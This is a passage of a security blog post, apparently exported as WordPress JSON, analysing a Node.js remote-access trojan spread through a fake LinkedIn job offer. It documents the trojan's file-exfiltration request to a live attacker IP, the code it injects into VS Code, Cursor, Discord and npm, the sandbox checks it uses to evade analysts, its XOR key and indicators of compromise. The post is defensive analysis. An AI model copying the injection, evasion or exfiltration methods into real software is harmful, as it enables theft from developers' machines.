a shell command<\/td>\n<\/tr>\n<tr>\n<td>text starting with <code>*<\/code><\/td>\n<td>starts an arbitrary background program with attacker-supplied arguments<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3><span class=\"ez-toc-section\" id=\"Exfiltration_format\"><\/span>Exfiltration format<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<pre><code>POST http:\/\/23.27.20.187\/u\/f\r\nContent-Type: multipart\/form-data\r\n\r\nclient_id = &lt;hostname&gt;$&lt;username&gt;\r\npath      = &lt;operator-selected destination&gt;\r\nfile      = under the local file's basename<\/code><\/pre>\n<p>For recursive uploads it walks the selected directory using <code>readdirSync<\/code> and <code>statSync<\/code>, computes each file&#8217;s relative path and uploads them one by one so the structure is preserved on the attacker&#8217;s side.<\/p>\n<p>Even without a single command, the payload automatically sends machine and session metadata over Socket.IO, plus persistence status telemetry to:<\/p>\n<pre><code>POST http:\/\/23.27.20.187\/verify-human\/&lt;campaign label&gt;<\/code><\/pre>\n<p>It reads the clipboard through <code>Get-Clipboard<\/code>, <code>pbpaste<\/code> or <code>xclip<\/code> depending on the platform.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Persistence_paths\"><\/span>Persistence paths<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>About one second after startup the payload looks for the JavaScript entry points of common developer applications and npm:<\/p>\n<pre><code>VS Code          resources\/app\/node_modules\/@vscode\/deviceid\/dist\/index.js\r\nCursor           resources\/app\/node_modules\/@vscode\/deviceid\/dist\/index.js\r\nAntigravity      resources\/app\/node_modules\/@vscode\/deviceid\/dist\/index.js\r\nDiscord          discord_desktop_core\/index.js\r\nGitHub Desktop   resources\/app\/main.js\r\nnpm CLI          node_modules\/npm\/lib\/cli.js<\/code><\/pre>\n<p>Paths are defined separately for Windows, macOS and Linux.<\/p>\n<p>The injection strips older recognised blocks, adds roughly two hundred spaces and appends:<\/p>\n<pre><code>\/*C260521A*\/\r\nglobal['e']='&lt;target label&gt;';\r\nglobal.i='*8-0';\r\n\/* persistence body beginning with \/*RS260605*\/ *\/<\/code><\/pre>\n<p>Target labels:<\/p>\n<pre><code>app-vscode-eval\r\napp-cursor-eval\r\napp-antigravity-eval\r\napp-discord-eval\r\napp-GitHubDesktop-eval\r\nNPM<\/code><\/pre>\n<p>The payload also installs its own dependencies (<code>axios<\/code>, <code>socket.io-client<\/code>, <code>form-data<\/code>) into <code>~\/.node_modules<\/code> or <code>~\/.node_module<\/code> and drops a first-visit marker:<\/p>\n<pre><code>Linux\/macOS: \/tmp\/.&lt;base64 of username&gt;\r\nWindows:     %LOCALAPPDATA%&#92;Temp&#92;&lt;base64 of username&gt;<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"Environment_checks\"><\/span>Environment checks<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>The sample tests its environment and behaves differently on a match. It looks at the <code>jsbot<\/code> environment variable, the usernames <code>github-runner<\/code> and <code>buildbot<\/code>, and hostnames such as <code>build-*<\/code>, <code>sandbox-pool-*<\/code>, <code>buildkitsandbox<\/code>, <code>cloudchamber<\/code>, <code>nijin-lab<\/code> and two specific <code>EV-<\/code> names.<\/p>\n<p>Practical implication for analysts: do not name your VM after what it is for.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"The_secondary_branch\"><\/span>The secondary branch<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>The secondary loader from <code>\/0\/boot<\/code> requests <code>\/0\/body<\/code>, XOR-decodes it with the key <code>YU7m{rE\/&gt;|==b&gt;#~<\/code> and evaluates it. I tried to fetch the body at 15:58 UTC and the server no longer answered on either port. Somewhere between the run and that attempt, the infrastructure went dark.<\/p>\n<h3><span class=\"ez-toc-section\" id=\"Indicators_of_compromise\"><\/span>Indicators of compromise<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p><strong>Repository and commit<\/strong><\/p>\n<pre><code>Repository: gitcomp88\/AICryptoTrader\r\nHEAD:       319dbc61b24e1655ff61bd604b8aee3aa1ca0941\r\nParent:     b7abbbb6c6f13ced564fd31c74a6396f3e438405\r\nMessage:    Refactoring codebse for speed<\/code><\/pre>\n<p><strong>Attacker-side accounts<\/strong><\/p>\n<pre><code>gitcomp88\r\ngitforcpc903<\/code><\/pre>\n<p>These are investigation indicators, not proof of identity.<\/p>\n<p><strong>Malicious files in the repository<\/strong><\/p>\n<pre><code>vite.config.ts\r\npostcss.config.js<\/code><\/pre>\n<p><strong>Network<\/strong><\/p>\n<pre><code>23.27.20.187\r\nhttp:\/\/23.27.20.187:443        Socket.IO command channel\r\n\/boot  \/init  \/0\/boot  \/0\/body\r\n\/u\/f                            stolen file upload\r\n\/verify-human\/&lt;campaign&gt;        telemetry<\/code><\/pre>\n<p><strong>Markers<\/strong><\/p>\n<pre><code>33ff3edaf55a8e03dcbc7cb40d498a49    campaign identifier\r\n*8-0                                build label\r\n\/*RS260605*\/                        persistence body\r\n\/*C260521A*\/                        injection marker<\/code><\/pre>\n<p>Older injection markers: <code>\/*C250617A*\/<\/code>, <code>\/*C250618A*\/<\/code>, <code>\/*C250619A*\/<\/code>, <code>\/*C250620A*\/<\/code>, <code>\/*C260511A*\/<\/code>, <code>\/*C260512A*\/<\/code><\/p>\n<p><strong>Version and key<\/strong><\/p>\n<pre><code>malware version:        260804\r\nsecondary XOR key:      YU7m{rE\/&gt;|==b&gt;#~<\/code><\/pre>\n<p><strong>Local artifacts<\/strong><\/p>\n<pre><code>~\/.node_modules\r\n~\/.node_module\r\n\/tmp\/.&lt;base64 of username&gt;\r\n%LOCALAPPDATA%&#92;Temp&#92;&lt;base64 of username&gt;<\/code><\/pre>\n<p><strong>Ethereum<\/strong><\/p>\n<pre><code>Tx:        0x1ee850dfe646976e3783dcd1db11282316234cf46efc62b218557e9bef2670a3\r\nSender:    0x33ff3edaf55a8e03dcbc7cb40d498a49cd499891\r\nRecipient: 0x171b14bb01bb171b14bb0050eb7f39c35c47e682\r\nRPC:       eth.drpc.org, eth-mainnet.public.blastapi.io, ethereum-rpc.publicnode.com1<\/code><\/pre>\n<p><strong>Hashes<\/strong><\/p>\n<pre><code>Project overview PDF:   1219c37891cede90e98b6102b4b80d485ec6d410eda3d5bb1666ca8ab57a564e\r\nRepository loader:      ed6c0476c62bc21c981b95861677bf14eeeaba57ac071c860d0e599ecbf6156c\r\nPrimary \/boot:          950a8f79e48cb6b36d731bb7adf695e2420014813d5705ce41ea8090e8b06724\r\nSecondary \/0\/boot:      62b19e0cbb110bc5d33ad4db07af9c7d1018c3951350369d6bdf2b2c1ebc2828\r\nDecoded primary:        aabf3f0cacd91e1bcb0edbd1335b40a9bfade8e7d31c98946b0b876bec69592f\r\nDecoded secondary:      929967e719214aa6547126bb96636f15d9c230bb4f3dac2bc82578494c5f635e\r\nReal \/init JSON:        574919a51df20bb3c73268a2cb2f18739d3408e29a4d6ec7dcba62fa8b5c0264\r\nField _B:               f68955621b28c1715677117b0b38e18cd8e92717ca8eadb44f47a5cc08aef4a3\r\nUnpacked _B body:       624d915598f6b48eeeaabaee19824fcecc35570c4e3a246dda5eaae97db364dd\r\nField _Z:               7ca3d571b64b815dcef80c0938ea30d48df06fcbe00d346c73849bd1b1f4abe7<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"The_whole_chain\"><\/span>The whole chain<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<pre><code>fake profile with an unverifiable position at a large company\r\n\u2192 job offer at an attractive rate\r\n\u2192 private GitHub repository invitation\r\n\u2192 frontend generated in an AI builder as the bait\r\n\u2192 copied history of a legitimate project used as credibility\r\n\u2192 follow-up asking \"have you run it yet?\"\r\n\u2192 obfuscated loader appended to the Vite and PostCSS config\r\n\u2192 npm run dev\r\n\u2192 Ethereum JSON-RPC query\r\n\u2192 C2 address decoded from the recipient of a transaction\r\n\u2192 GET \/boot and \/0\/boot\r\n\u2192 two obfuscated stages through node -e\r\n\u2192 GET \/init\r\n\u2192 Node.js RAT version 260804\r\n\u2192 injection into VS Code, Cursor, Antigravity, Discord, GitHub Desktop and npm\r\n\u2192 Socket.IO command channel on unencrypted port 443\r\n\u2192 clipboard, shell, eval, recursive directory upload\r\n\u2192 exfiltration to \/u\/f<\/code><\/pre>\n<h3><span class=\"ez-toc-section\" id=\"Limitations\"><\/span>Limitations<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>I unpacked the main payload statically, meaning without executing its operational part. The commands, persistence and exfiltration format described here are read out of its own code, not observed at runtime. I do not have the <code>\/0\/body<\/code> branch, because the C2 stopped responding. The <code>_Z<\/code> persistence body remains heavily obfuscated, although its role and injection mechanism are proven from the main payload. The victim contained no real data, wallets or credentials. GitHub account names, commit metadata, the LinkedIn name and everything the attacker claimed about himself may be fabricated or stolen.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A LinkedIn job offer led to a private repository with malware in it. It reads its server address out of an Ethereum transaction, and on first run it writes itself into VS Code, Cursor and npm.<\/p>\n","protected":false},"author":1,"featured_media":7146,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_vp_format_video_url":"","_vp_image_focal_point":[],"footnotes":""},"categories":[1,75,37],"tags":[128,126,125,127],"class_list":["post-7138","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-hacky","category-techniky-hackeru","tag-blockchain","tag-linkedin","tag-malware","tag-rat"],"translation":{"provider":"WPGlobus","version":"3.0.3","language":"en","enabled_languages":["cs","en"],"languages":{"cs":{"title":true,"content":true,"excerpt":true},"en":{"title":true,"content":true,"excerpt":true}}},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>I ran malware on purpose. It found its server address in the blockchain - DIGITAL SELF-DEFENSE<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"I ran malware on purpose. It found its server address in the blockchain - DIGITAL SELF-DEFENSE\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/\" \/>\n<meta property=\"og:site_name\" content=\"DIGITAL SELF-DEFENSE\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/digitalnisebeobrana\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/digitalnisebeobrana\/\" \/>\n<meta property=\"article:published_time\" content=\"2026-08-06T11:52:10+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-08-07T07:06:18+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/featured-1024x683.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"683\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Milan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@sodomak\" \/>\n<meta name=\"twitter:site\" content=\"@sodomak\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Milan\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/\"},\"author\":{\"name\":\"Milan\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#\\\/schema\\\/person\\\/e932432719ebfc02a9b05e7b12047736\"},\"headline\":\"I ran malware on purpose. It found its server address in the blockchain\",\"datePublished\":\"2026-08-06T11:52:10+00:00\",\"dateModified\":\"2026-08-07T07:06:18+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/\"},\"wordCount\":9738,\"publisher\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#\\\/schema\\\/person\\\/e932432719ebfc02a9b05e7b12047736\"},\"image\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/featured.png\",\"keywords\":[\"blockchain\",\"linkedin\",\"malware\",\"RAT\"],\"articleSection\":[\"Blog\",\"hacky\",\"Techniky hacker\u016f\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/\",\"url\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/\",\"name\":\"I ran malware on purpose. It found its server address in the blockchain - DIGITAL SELF-DEFENSE\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/featured.png\",\"datePublished\":\"2026-08-06T11:52:10+00:00\",\"dateModified\":\"2026-08-07T07:06:18+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/featured.png\",\"contentUrl\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2026\\\/08\\\/featured.png\",\"width\":1536,\"height\":1024},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"I ran malware on purpose. It found its server address in the blockchain\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#website\",\"url\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/\",\"name\":\"DIGITAL SELF-DEFENSE\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#\\\/schema\\\/person\\\/e932432719ebfc02a9b05e7b12047736\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/en\\\/#\\\/schema\\\/person\\\/e932432719ebfc02a9b05e7b12047736\",\"name\":\"Milan\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/logo.png\",\"url\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/logo.png\",\"contentUrl\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/logo.png\",\"width\":613,\"height\":73,\"caption\":\"Milan\"},\"logo\":{\"@id\":\"https:\\\/\\\/www.digitalnisebeobrana.cz\\\/wp-content\\\/uploads\\\/2022\\\/01\\\/logo.png\"},\"description\":\"Jmenuji se Milan P\u016flkr\u00e1bek, pamatuji si po\u010d\u00edta\u010de bez internetu, Internet bez Google a mobiln\u00ed komunikaci bez \u0161ifrov\u00e1n\u00ed. M\u00e1m za sebou v\u00edce ne\u017e dvacet let profesion\u00e1ln\u00ed praxe v IT, p\u0159edn\u00e1\u0161\u00edm a p\u00ed\u0161u \u010dl\u00e1nky o IT bezpe\u010dnosti, kryptom\u011bn\u00e1ch a nov\u00fdch technologi\u00edch. Od roku 2014 jsem sou\u010d\u00e1st\u00ed nezikov\u00e9 organizace Paraleln\u00ed Polis v Praze.\",\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/digitalnisebeobrana\\\/\",\"https:\\\/\\\/x.com\\\/sodomak\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"I ran malware on purpose. It found its server address in the blockchain - DIGITAL SELF-DEFENSE","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/","og_locale":"en_US","og_type":"article","og_title":"I ran malware on purpose. It found its server address in the blockchain - DIGITAL SELF-DEFENSE","og_url":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/","og_site_name":"DIGITAL SELF-DEFENSE","article_publisher":"https:\/\/www.facebook.com\/digitalnisebeobrana\/","article_author":"https:\/\/www.facebook.com\/digitalnisebeobrana\/","article_published_time":"2026-08-06T11:52:10+00:00","article_modified_time":"2026-08-07T07:06:18+00:00","og_image":[{"width":1024,"height":683,"url":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/featured-1024x683.png","type":"image\/png"}],"author":"Milan","twitter_card":"summary_large_image","twitter_creator":"@sodomak","twitter_site":"@sodomak","twitter_misc":{"Written by":"Milan","Est. reading time":"19 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/#article","isPartOf":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/"},"author":{"name":"Milan","@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#\/schema\/person\/e932432719ebfc02a9b05e7b12047736"},"headline":"I ran malware on purpose. It found its server address in the blockchain","datePublished":"2026-08-06T11:52:10+00:00","dateModified":"2026-08-07T07:06:18+00:00","mainEntityOfPage":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/"},"wordCount":9738,"publisher":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#\/schema\/person\/e932432719ebfc02a9b05e7b12047736"},"image":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/#primaryimage"},"thumbnailUrl":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/featured.png","keywords":["blockchain","linkedin","malware","RAT"],"articleSection":["Blog","hacky","Techniky hacker\u016f"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/","url":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/","name":"I ran malware on purpose. It found its server address in the blockchain - DIGITAL SELF-DEFENSE","isPartOf":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/#primaryimage"},"image":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/#primaryimage"},"thumbnailUrl":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/featured.png","datePublished":"2026-08-06T11:52:10+00:00","dateModified":"2026-08-07T07:06:18+00:00","breadcrumb":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/#primaryimage","url":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/featured.png","contentUrl":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2026\/08\/featured.png","width":1536,"height":1024},{"@type":"BreadcrumbList","@id":"https:\/\/www.digitalnisebeobrana.cz\/i-ran-malware-on-purpose-it-found-its-server-address-in-the-blockchain\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.digitalnisebeobrana.cz\/"},{"@type":"ListItem","position":2,"name":"I ran malware on purpose. It found its server address in the blockchain"}]},{"@type":"WebSite","@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#website","url":"https:\/\/www.digitalnisebeobrana.cz\/en\/","name":"DIGITAL SELF-DEFENSE","description":"","publisher":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#\/schema\/person\/e932432719ebfc02a9b05e7b12047736"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.digitalnisebeobrana.cz\/en\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":["Person","Organization"],"@id":"https:\/\/www.digitalnisebeobrana.cz\/en\/#\/schema\/person\/e932432719ebfc02a9b05e7b12047736","name":"Milan","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2022\/01\/logo.png","url":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2022\/01\/logo.png","contentUrl":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2022\/01\/logo.png","width":613,"height":73,"caption":"Milan"},"logo":{"@id":"https:\/\/www.digitalnisebeobrana.cz\/wp-content\/uploads\/2022\/01\/logo.png"},"description":"Jmenuji se Milan P\u016flkr\u00e1bek, pamatuji si po\u010d\u00edta\u010de bez internetu, Internet bez Google a mobiln\u00ed komunikaci bez \u0161ifrov\u00e1n\u00ed. M\u00e1m za sebou v\u00edce ne\u017e dvacet let profesion\u00e1ln\u00ed praxe v IT, p\u0159edn\u00e1\u0161\u00edm a p\u00ed\u0161u \u010dl\u00e1nky o IT bezpe\u010dnosti, kryptom\u011bn\u00e1ch a nov\u00fdch technologi\u00edch. Od roku 2014 jsem sou\u010d\u00e1st\u00ed nezikov\u00e9 organizace Paraleln\u00ed Polis v Praze.","sameAs":["https:\/\/www.facebook.com\/digitalnisebeobrana\/","https:\/\/x.com\/sodomak"]}]}},"_links":{"self":[{"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/posts\/7138","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/comments?post=7138"}],"version-history":[{"count":17,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/posts\/7138\/revisions"}],"predecessor-version":[{"id":7166,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/posts\/7138\/revisions\/7166"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/media\/7146"}],"wp:attachment":[{"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/media?parent=7138"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/categories?post=7138"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.digitalnisebeobrana.cz\/en\/wp-json\/wp\/v2\/tags?post=7138"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}